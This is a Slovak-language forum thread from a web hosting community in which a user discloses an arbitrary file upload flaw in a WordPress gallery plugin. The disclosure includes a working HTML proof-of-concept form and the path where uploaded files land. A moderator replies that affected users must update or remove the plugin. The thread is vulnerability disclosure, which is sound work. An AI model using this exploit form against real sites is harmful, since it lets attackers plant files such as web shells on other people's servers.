Nejste přihlášeni
- Témata: Aktivní | Nezodpovězená
Stránky 1
#1 2017-04-16 15:10:11
- csafunsitecz
- Endora uživatel
- Registrován: 1970-01-01
- Příspěvky: 2
wp-dreamworkgallery
Exploit v plugine dreamworkgallery vo Wordpress-e umožňuje útočníkový uploadnúť na stránku súbor bez vedommia majitela.
Na endore to funguje na nemenovanej stránke.| User: samsoncz | Admin : root@endora.cz
CODE:
-------------------------------------------------------------------------------------------------------------
<html>
<body>
<form action="http://názov_stránky/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
-------------------------------------------------------------------------------------------------------------
uploadnutý súbor sa nachádza: /wp-content/uploads/dreamwork/[číslo]_uploadfolder/big/[váš súbor]
FIX !!!
Upravil csafunsitecz (2017-04-16 16:20:15)
Offline
#2 2017-04-16 17:58:06
- JF
- Endora rádce
- Místo: ....nice u Plzně
- Registrován: 2010-06-22
- Příspěvky: 11,939
Re: wp-dreamworkgallery
Toto zabezpečenie budú musieť riešiť jednotlivý užívatelia ktorý plugin používajú aby ho buď aktualizovali alebo odstránili. Inak im hrozí že sa útočník dostane ku všetkým ich doménam ktoré majú v účte.
Administrátori váš ticket evidujú a budú ho riešiť hneď ako to bude možné aby informovali jednotlivých užívateľov ktorých sa to týka.
Offline
#3 2017-04-16 20:41:34
- csafunsitecz
- Endora uživatel
- Registrován: 1970-01-01
- Příspěvky: 2
Re: wp-dreamworkgallery
Ďakujem za odpoveď.
Offline
Stránky 1